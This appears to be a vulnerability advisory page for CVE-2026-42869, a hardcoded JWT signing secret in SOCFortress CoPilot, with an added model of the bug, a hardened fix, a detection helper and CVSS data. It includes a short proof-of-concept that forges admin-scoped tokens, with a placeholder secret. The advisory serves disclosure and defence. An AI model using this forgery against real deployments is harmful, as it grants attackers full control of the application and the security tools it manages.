Security Vulnerability Report
CVE-2026-42869 CVSS 10.0 CRITICAL

CVE-2026-42869

Published: 2026-05-11 20:25:43
Last Modified: 2026-05-11 20:25:43

Description

SOCFortress CoPilot focuses on providing a single pane of glass for all your security operations needs. Prior to 0.1.57, SOCFortress CoPilot ships a hardcoded JWT signing secret as a fallback value in backend/app/auth/utils.py:28 and ships it verbatim in .env.example. Any deployment where JWT_SECRET is not explicitly set — including the default Docker Compose setup — signs all authentication tokens with this publicly known value. An unauthenticated attacker can forge arbitrary admin-scoped JWTs and gain full control of the application and every security tool it manages without any credentials. This vulnerability is fixed in 0.1.57.
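The pattern the description names is `os.getenv("JWT_SECRET", <built-in default>)`: when the variable is unset, every token is signed with a string that is also committed to the repository and to .env.example, so the "secret" is public. The following is an added example (not CoPilot's code; the placeholder default, the MIN_SECRET_BYTES threshold, the function names and the sub/role claim names are all assumptions) that goes slightly beyond the advisory: it shows the vulnerable loader next to a fail-closed one, a stdlib-only HS256 encoder/verifier so the forgery can be reproduced without PyJWT, and a defender-side check that tells you whether a token captured from a running deployment validates under a known default secret.

```python
"""Model of CVE-2026-42869: a JWT signing secret that silently falls back to a
hardcoded default when JWT_SECRET is unset. Added example, not CoPilot's own
code. PLACEHOLDER_DEFAULT stands in for the published value (assumption)."""
import base64
import hashlib
import hmac
import json
import time

PLACEHOLDER_DEFAULT = "copilot-example-default-secret"  # hypothetical, not the leaked string
MIN_SECRET_BYTES = 32  # assumed policy: 256 bits of key material for HS256


def load_secret_vulnerable(env):
    """The advisory's pattern: an unset variable becomes a public constant."""
    return env.get("JWT_SECRET", PLACEHOLDER_DEFAULT)


def load_secret_hardened(env, known_defaults=(PLACEHOLDER_DEFAULT,)):
    """Fail closed: refuse to start without an explicit, non-default, long secret."""
    secret = env.get("JWT_SECRET")
    if not secret:
        raise RuntimeError("JWT_SECRET must be set; refusing to use a built-in default")
    if secret in known_defaults:
        raise RuntimeError("JWT_SECRET is a published placeholder; generate a fresh one")
    if len(secret.encode()) < MIN_SECRET_BYTES:
        raise RuntimeError(f"JWT_SECRET must be at least {MIN_SECRET_BYTES} bytes")
    return secret


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Minimal HS256 JWT encoder (stdlib only, no PyJWT dependency)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, secret: str, now=None):
    """Return the payload if the HS256 signature matches `secret` and the token is
    unexpired, else None. Only HS256 is accepted, so an 'alg' swap is rejected."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        payload = json.loads(_b64url_decode(body_b64))
    except ValueError:  # bad split, bad base64, bad JSON, bad UTF-8
        return None
    now = time.time() if now is None else now
    if "exp" in payload and payload["exp"] < now:
        return None
    return payload


def signed_with_known_secret(token: str, candidates):
    """Defender-side check: does a token captured from a deployment validate under
    any published or default secret? Returns the matching secret, else None."""
    for candidate in candidates:
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None


if __name__ == "__main__":
    env = {}  # constructed: a Docker Compose style environment with JWT_SECRET unset
    weak = load_secret_vulnerable(env)
    forged = sign_hs256({"sub": "admin", "role": "admin", "exp": int(time.time()) + 3600}, weak)
    print("forged token validates under the default secret:",
          signed_with_known_secret(forged, [PLACEHOLDER_DEFAULT]) is not None)
    try:
        load_secret_hardened(env)
    except RuntimeError as exc:
        print("hardened loader refused to start:", exc)
```

To triage a live instance, take any session token issued by the deployment and pass it to `signed_with_known_secret` with the value from the pre-0.1.57 .env.example; a match means the deployment is running on the public secret and every existing token must be treated as forgeable, so rotate the secret and invalidate sessions rather than only upgrading.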

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

SOCFortress CoPilot < 0.1.57

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import datetime

import jwt


def forge_admin_token():
    # The hardcoded secret found in backend/app/auth/utils.py:28.
    # Replace 'YOUR_HARDCODED_SECRET_HERE' with the actual secret from the vulnerable source code.
    HARDCODED_SECRET = 'YOUR_HARDCODED_SECRET_HERE'

    # Construct a payload with admin privileges.
    # Adjust 'sub', 'role', or other fields based on the application's specific JWT requirements.
    payload = {
        'sub': 'admin',   # Subject (user ID)
        'role': 'admin',  # Role
        'exp': datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=30),  # Expiration
    }

    # Forge the token using the HS256 algorithm and the hardcoded secret.
    forged_token = jwt.encode(payload, HARDCODED_SECRET, algorithm='HS256')
    print(f"Forged Admin JWT: {forged_token}")
    return forged_token


if __name__ == "__main__":
    forge_admin_token()

References

https://github.com/socfortress/CoPilot/commit/4640511a0cf2e7b144a71375b5b349a8318cb186
https://github.com/socfortress/CoPilot/pull/814
https://github.com/socfortress/CoPilot/security/advisories/GHSA-4gxj-hw3c-3x2x

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42869", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:43.347", "lastModified": "2026-05-11T20:25:43.347", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCFortress CoPilot focuses on providing a single pane of glass for all your security operations needs. Prior to 0.1.57, SOCFortress CoPilot ships a hardcoded JWT signing secret as a fallback value in backend/app/auth/utils.py:28 and ships it verbatim in .env.example. Any deployment where JWT_SECRET is not explicitly set — including the default Docker Compose setup — signs all authentication tokens with this publicly known value. An unauthenticated attacker can forge arbitrary admin-scoped JWTs and gain full control of the application and every security tool it manages without any credentials. This vulnerability is fixed in 0.1.57."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/socfortress/CoPilot/commit/4640511a0cf2e7b144a71375b5b349a8318cb186", "source": "[email protected]"}, {"url": "https://github.com/socfortress/CoPilot/pull/814", "source": "[email protected]"}, {"url": "https://github.com/socfortress/CoPilot/security/advisories/GHSA-4gxj-hw3c-3x2x", "source": "[email protected]"}]}}